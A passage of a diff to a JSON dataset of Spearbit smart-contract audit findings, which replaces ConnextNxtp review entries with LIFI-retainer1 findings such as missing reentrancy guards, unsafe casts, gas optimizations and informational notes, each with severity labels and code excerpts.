custom errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The codebase includes a mix of require statements and custom errors.", + "title": "Absence of nonReentrant in HopFacetOptimized facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks are done on purpose to save gas. However, the most important check is the nonReentrant modifier. On several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 18 tokens, custom tokens, native tokens transfers. In combination with the complexity of the code and the power of ERC20Proxy.sol it is difficult to make sure no attacks can occur.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "WatcherManager can make watchers public instead of having a getter function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make it public to avoid the need of an explicit getter function.", + "title": "Revert for excessive approvals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Certain tokens, such as UNI and COMP, undergo a reversal if the value input for approval or transfer surpasses uint96. Both aforementioned tokens possess unique logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these token so set to low risk.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Incorrect comment about relation between zero amount and asset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _- xcall() reverts when zero address is specified for _asset on a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment if amount is 0, _asset also has to be the zero address which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount);", + "title": "Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or getting stuck in the process. This issue can arise when the fee rate is not set correctly or there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "New Connector needs to be deployed if AMB changes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The AMB address is configured to be immutable. If any of the chain's AMB changes, the Connector needs to be deployed. /** * @notice Address of the AMB on this domain. */ address public immutable AMB;", + "title": "Incorrect value emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "LibSwap.swap() emits the following emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount as the observer won't know which of the two values has been emitted.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Functions should be renamed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The following functions should be renamed to be aligned with the naming convention of the fxPortal contracts. OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild", + "title": "Storage slots derived from hashes are prone to pre-image attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Storage slots manually constructed using keccak hash of a string are prone to storage slot collision as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Twice function aggregate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... ,! } RootManager.sol 120 function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... }", + "title": "Incorrect arguments compared in SquidFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "startBridgeTokensViaSquid () reverts if (_squidData.sourceCalls.length > 0) != _bridge- Data.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to Squid Router, and _bridge- Data.hasSourceSwaps refers to source swaps done by SquidFacet. Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced) which means _squidData.sourceCalls.length has to be 0 for it to successfully execute.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Careful when using _removeAssetId()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _removeAssetId() removes an assets. Although it is called via authorized functions, mistakes could be made. It there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and allowed in the StableSwap. If so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... }", + "title": "Unsafe casting of bridge amount from uint256 to uint128", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The issue with the code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may result in a loss of precision or even an overflow. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) + );", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Unused import IAavePool in InboxFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Contract InboxFacet imports IAavePool, however it doesn't use it. import {IAavePool} from \"../interfaces/IAavePool.sol\";", + "title": "Cache s.anyTokenAddresses[_bridgeData.sendingAssetId]", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of MultichainFacet contains the following expresssion. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ? ,! s.anyTokenAddresses[_bridgeData.sendingAssetId]: ...", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Use IERC20Metadata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "interface. pelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", + "title": "DeBridgeFacet permit seems unusable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this function doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Generic name of proposedTimestamp()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function proposedTimestamp() has a very generic name. As there are other Timestamp func- tions this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; }", + "title": "Redundant checks in CircleBridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. 22 function swapAndStartBridgeTokensViaCircleBridge(...) ... { ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ... } modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Two different nonces", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces;", + "title": "Redundant check on _swapData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "This check is not present in the majority of the facets if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required as _depositAndSwap() reverts when length is 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Tips to optimize rootWithCtx", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... ,! }", + "title": "Duplicate checks done", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In highlighted cases, a check has been done multiple times at different places: validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() does checks already done by functions from which it's called. depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok().", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Use delete", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete. So using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... }", + "title": "calldata can be used instead of memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "When the incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": " When abi.encodeWithSignature is used the compiler does not check for mistakes in the signature or the types provided. When abi.encodeWithSelector is used the compiler does not check for parameter type inconsistencies.", + "title": "Further gas optimizations for HopFacetOptimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbritrum, it is relatively expensive due to the calldata. 24 struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ... { if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "setAggregators is missing checks against address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setAggregators does not check if tokenAddresses[i] or sources[i] is address(0).", + "title": "payable keyword can be removed for some bridge functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "For the above highlighted functions, the native token is never forwarded to the underlying bridge. In these cases, payable keyword and related modifier refundExcessNative(payable(msg.sender)) can be re- moved to save gas.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "setAggregators can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setAggregators does not check if tokenAddresses length is equal to sources to revert early.", + "title": "AmarokData.callTo can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "AmarokFacet's final receiver can be different from _bridgeData.receiver address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed as the final receiver.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Event is not emitted when an important action happens on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "No event is emitted when an important action happens on-chain.", + "title": "Use requiredEther variable instead of adding twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The cost and nativeAmount are added twice to calculate the requiredEther variable, which can lead to increased gas consumption.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It is always assumed last + 1 >= first. It would be great to add unit/fuzz tests to check for this invariant. Adding these tests", + "title": "refundExcessNative modifier can be gas-optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The highlighted code above can be gas-optimized by removing 1 if condition.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Consider using prefix(...) instead of slice(0,...)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "tokenId() calls TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal.", + "title": "BridgeData.hasSourceSwaps can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The field hasSourceSwaps can be removed from the struct BridgeData. _swapData is enough to identify if source swaps are needed.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Elaborate TypedMemView encoding in comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous.", + "title": "Unnecessary validation argument for native token amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Since both msg.value and feeAmount is controlled by the caller, you can remove feeAmount as an argument and assume msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Remove Curve StableSwap paper URL", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "www.curve.fi/stableswap-paper.pdf The current working URL is curve.fi/files/stableswap-paper.pdf. to Curve StableSwap paper referenced in comments Link is no longer active:", + "title": "Restrict access for cBridge refunds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge specific it can do any calls for the Diamond contract. Restricting what that function can call would allow more secure automation of refunds.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Missing Validations in AmplificationUtils.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. If initialAPrecise=futureAPrecise then there will not be any ramping. 2. In stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp since once current timestamp has reached futureATime, futureAprice will be returned al- ways.", + "title": "Stargate now supports multiple pools for the same token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Stargate protocol now supports multiple pools for the same token on the same chain, each pool may be connected to one or many other chains. It is not possible to store a one-to-one token-to-pool mapping.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Incorrect PriceSource is returned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Price Source is returned incorrectly in case of stale prices as shown below 1. getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0. uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now contract tries to retrieve price from oracle. In case the price is outdated, the returned price will again be 0 and source would be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 128 4. Assuming v1PriceOracle is not yet set, contract will simply return the price and source which in this case is 0, PriceSource.CHAINLINK. In this case amount is correct but source is not correct. return (tokenPrice, uint256(source));", + "title": "Expose receiver in GenericSwapFacet facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Other than the bridge facets the swap facet does not emit the receiver of a transaction yet.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "PriceSource.DEX is never used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The enum value DEX is never used in the contract and can be removed.", + "title": "Track the destination chain on ServiceFeeCollector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "ServiceFeeCollector collects gas fees to send to the destination chain. For example /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Incorrect comment about handleOutgoingAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment is incorrect as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. */ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal {", + "title": "Executor can reuse SwapperV2 functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Executor.sol's noLeftOvers and _fetchBalances() is copied from SwapperV2.sol.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "SafeMath is not required for Solidity 0.8.x", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library", + "title": "Consider adding onERC1155Received", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In addition to ERC721, NFTs can be created using ERC1155 standard. Since, the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use a deadline check modifier in ProposedOwnable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted out in a modifier for readability.", + "title": "SquidFacet uses a different string encoding library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "SquidFacet uses an OZ library to convert address to string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use ExcessivelySafeCall in SpokeConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The low-level call code highlighted code above looks to be copied from ExcessivelySafeCall.sol. replacing this low-level call with the function call ExcessivelySafe- Consider", + "title": "Assembly in StargateFacet can be replaced with Solidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function toBytes() contains assembly code that can also be replaced with solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. 30 function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address,0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20),xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight.", + "title": "Doublecheck quoteLayerZeroFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function quoteLayerZeroFee uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ... , toBytes(msg.sender) ); } function _startBridge(...) ... router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "The constant expression for EMPTY_HASH can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "EMPTY_HASH is a constant with a value equal to: hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\", which is the keccak256 of an empty bytes. We can replace this constant hex literal with a more readable alternative.", + "title": "Missing modifier refundExcessNative()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet() and Gnosis- BridgeL2Facet() don't have the modifier refundExcessNative(). While other Facets have such a modifier.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Simplify and add more documentation for getTokenPrice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "getTokenPrice can be simplified and it can try to return early whenever possible.", + "title": "Special case for cfUSDC tokens in CelerIMFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't have this. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ... } function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Remove unused code, files, interfaces, libraries, contracts, ...", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use.", + "title": "External calls of SquidFacet", + "html_url": 